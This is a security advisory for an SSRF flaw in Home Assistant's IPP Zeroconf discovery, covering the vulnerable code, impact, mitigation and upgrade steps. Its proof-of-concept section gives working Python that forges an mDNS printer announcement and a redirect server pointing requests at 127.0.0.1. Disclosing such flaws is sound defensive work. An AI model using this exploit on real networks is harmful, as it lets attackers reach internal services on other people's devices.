CVE-2026-91129: Home Assistant: mDNS Server-Side Request Forgery

Published Sep 22, 2026
·
Updated

Summary

Home Assistant Green is vulnerable to a Server-Side Request Forgery (SSRF) via the mDNS/Zeroconf IPP integration. An unauthenticated attacker on the local network can send a crafted mDNS response to trick Home Assistant into making HTTP requests to arbitrary hosts, including internal services bound to localhost. The IPP integration automatically processes ipp.tcp.local service announcements without any user interaction or authentication, and follows HTTP redirects from the attacker-controlled host.

Details

Home Assistant listens for mDNS service announcements on port 5353. When a service of type ipp.tcp.local is discovered, the IPP integration's zeroconf handler (homeassistant/components/ipp/configflow.py) processes it automatically.

The asyncstepzeroconf method extracts host, port, and basepath directly from the mDNS discovery info without validation:

python async def asyncstepzeroconf( self, discoveryinfo: ZeroconfServiceInfo ) -> ConfigFlowResult: host = discoveryinfo.host port = discoveryinfo.port zctype = discoveryinfo.type name = discoveryinfo.name.replace(f".{zctype}", "") tls = zctype == "ipps.tcp.local." basepath = discoveryinfo.properties.get("rp", "ipp/print")

self.discoveryinfo.update( { CONFHOST: host, CONFPORT: port, CONFSSL: tls, CONFVERIFYSSL: False, CONFBASEPATH: f"/{basepath}", CONFNAME: name, CONFUUID: uniqueid, } )

These values are then passed to validateinput(), which constructs an HTTP request (IPP over HTTP) to the attacker-controlled host:

python async def validateinput(hass: HomeAssistant, data: dict) -> dict[str, Any]: session = asyncgetclientsession(hass) ipp = IPP( host=data[CONFHOST], port=data[CONFPORT], basepath=data[CONFBASEPATH], tls=data[CONFSSL], verifyssl=data[CONFVERIFYSSL], session=session, ) printer = await ipp.printer() return {CONFSERIAL: printer.info.serial, CONFUUID: printer.info.uuid}

The core issue is that during the intentional discovery and retrieval of additional device information, the HTTP session blindly follows redirects. This allows an attacker to point the request at 127.0.0.1 or other internal services that are not otherwise network-accessible.

An attacker crafts an mDNS response advertising a fake IPP printer that points to the attacker's IP. The attacker's HTTP server then responds with a 302 redirect to any internal endpoint, causing Home Assistant to make the request on the attacker's behalf.

PoC

The PoC demonstrates the SSRF by sending a crafted mDNS response that causes Home Assistant to connect to the attacker's HTTP server, which redirects the request to an internal service.

Prerequisites

- Attacker machine on the same local network as the Home Assistant Green device - Python 3 with dependencies: pip install -r requirements.txt

Exploit Code

The core mDNS spoofing function builds and sends a DNS response advertising a fake IPP printer:

python def builddnsresponse(servicename, servicetype, attackerip, attackerport): transactionid = 0x0000 # mDNS always 0 flags = 0x8400 # Standard response, authoritative answer qdcount = 0 ancount = 4 # 4 answers (servicetype, SRV, TXT, A) nscount = 0 arcount = 0

SRV = servicename + '.' + servicetype header = struct.pack("!HHHHHH", transactionid, flags, qdcount, ancount, nscount, arcount)

def encodename(name): parts = name.split(".") out = b"" for p in parts: out += bytes([len(p)]) + p.encode("utf-8") out += b"\x00" return out

answers = b""

# PTR record: ipp.tcp.local -> meomeo.ipp.tcp.local answers += encodename(servicetype) answers += struct.pack("!HHI", 12, 1, 1) target = encodename(SRV) answers += struct.pack("!H", len(target)) + target

# SRV record answers += encodename(SRV) answers += struct.pack("!HHI", 33, 1, 120) srvdata = struct.pack("!HHH", 0, 0, attackerport) + encodename("hihiabcdmeomeo.local") answers += struct.pack("!H", len(srvdata)) + srvdata

# TXT record txtstrs = [b"abcd=efgh"] txtrecord = b"".join(bytes([len(s)]) + s for s in txtstrs) answers += encodename(SRV) answers += struct.pack("!HHI", 16, 1, 120) answers += struct.pack("!H", len(txtrecord)) + txtrecord

# A record: hihiabcdmeomeo.local -> attacker IP answers += encodename("hihiabcdmeomeo.local") answers += struct.pack("!HHI", 1, 1, 120) ipbytes = socket.inetaton(attackerip) answers += struct.pack("!H", len(ipbytes)) + ipbytes

return header + answers

def sendmdnsresponse(servicename, servicetype, hasip, attackerip, attackerport): sock = socket.socket(socket.AFINET, socket.SOCKDGRAM, socket.IPPROTOUDP) sock.setsockopt(socket.IPPROTOIP, socket.IPMULTICASTTTL, 255) packet = builddnsresponse(servicename, servicetype, attackerip, attackerport) sock.sendto(packet, (hasip, 5353))

The attacker's HTTP server redirects the incoming IPP request to an internal service:

python class RedirectHandler(BaseHTTPRequestHandler): def doPOST(self): self.sendresponse(302) self.sendheader("Location", "http://127.0.0.1:<INTERNALPORT>/<path>") self.endheaders()

Usage

bash python3 zeroconf.py -type ipp.tcp.local -hasip <HOMEASSISTANTIP> -attackerip <ATTACKERIP> -name meomeo

Exploit Flow

1. The script starts an HTTP server on port 8000 that responds with a 302 redirect to an internal service 2. A crafted mDNS response is sent to Home Assistant, advertising a fake IPP printer pointing to the attacker's IP and port 8000 3. Home Assistant's IPP integration automatically discovers the "printer" and connects to the attacker's HTTP server 4. The attacker's server responds with a 302 redirect to http://127.0.0.1:<port>/<path> 5. Home Assistant follows the redirect, making a request to the internal service on the attacker's behalf

Impact

An unauthenticated attacker on the same local network can coerce Home Assistant into issuing HTTP requests to arbitrary hosts, including services bound to 127.0.0.1 or other internal addresses that are not otherwise reachable. Exploitation requires no user interaction and no prior IPP configuration — the IPP integration processes ipp.tcp.local announcements automatically, and the HTTP client used to fetch printer metadata follows attacker-supplied redirects.

Mitigations

The shared aiohttp client used by integrations now blocks cross-origin redirects to internal addresses: when a request to a non-loopback host is redirected to a loopback or unspecified address, the redirect is refused and an error is raised instead of being followed. The check matches both literal hostnames (localhost and its subdomains) and hostnames that resolve to a loopback IP, so DNS-based bypasses are covered. Relative redirects, non-network URI schemes, and requests that already target loopback (legitimate local integrations) are unaffected.

Acknowledgements

Discovered by ZDI (ZDI-CAN-28336)

Other sources

Home Assistant is open source home automation software focused on local control and privacy. Prior to 2026.2.3, the IPP integration automatically processed unauthenticated ipp.tcp.local mDNS announcements in homeassistant/components/ipp/configflow.py, where asyncstepzeroconf passed attacker-controlled host, port, and basepath values to validateinput for printer metadata retrieval. Because the shared HTTP client followed attacker-controlled cross-origin redirects without blocking loopback targets, a local-network attacker could redirect the request to 127.0.0.1 or another internal service without user interaction or prior IPP configuration. This issue is fixed in version 2026.2.3.

MITRE

Affected Software

2 affected componentsFixes available
Home Assistant Home Assistant<2026.2.3
pip/homeassistant<2026.2.2
2026.2.3

Remediation

Recommended actions to resolve this vulnerability, in priority order.

  1. Upgrade

    Upgrade pip/homeassistant to a version that resolves this vulnerability.

    Fixed in 2026.2.3
  2. Upgrade

    Upgrade Home Assistant to a version that resolves this vulnerability.

    Fixed in 2026.2.3

Event History

Sep 22, 2026
CVE Published
via MITRE·07:05 PM
Data Sourced
via MITRE·07:05 PM
DescriptionSeverityWeakness
Data Sourced
via NVD·07:16 PM
DescriptionSeverityWeakness
Advisory Published
via GitHub·08:40 PM
Data Sourced
via GitHub·08:40 PM
DescriptionSeverityWeaknessAffected Software

Frequently Asked Questions

1

Who can exploit this issue?

An attacker on the local network can exploit it by sending an unauthenticated _ipp._tcp.local mDNS announcement. No user interaction or prior IPP integration configuration is required.

2

What systems or configurations are affected?

Home Assistant versions before 2026.2.3 are affected where the IPP integration automatically processes mDNS printer announcements. The vulnerable discovery path is triggered by _ipp._tcp.local announcements on the local network.

3

What can the attacker cause Home Assistant to access?

The attacker can supply printer metadata endpoints and redirect Home Assistant's HTTP request across origins to 127.0.0.1 or another internal service. This can expose limited confidentiality and integrity impact through server-side requests to otherwise internal targets.

4

What is the remediation?

Upgrade Home Assistant to version 2026.2.3, which fixes the issue.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203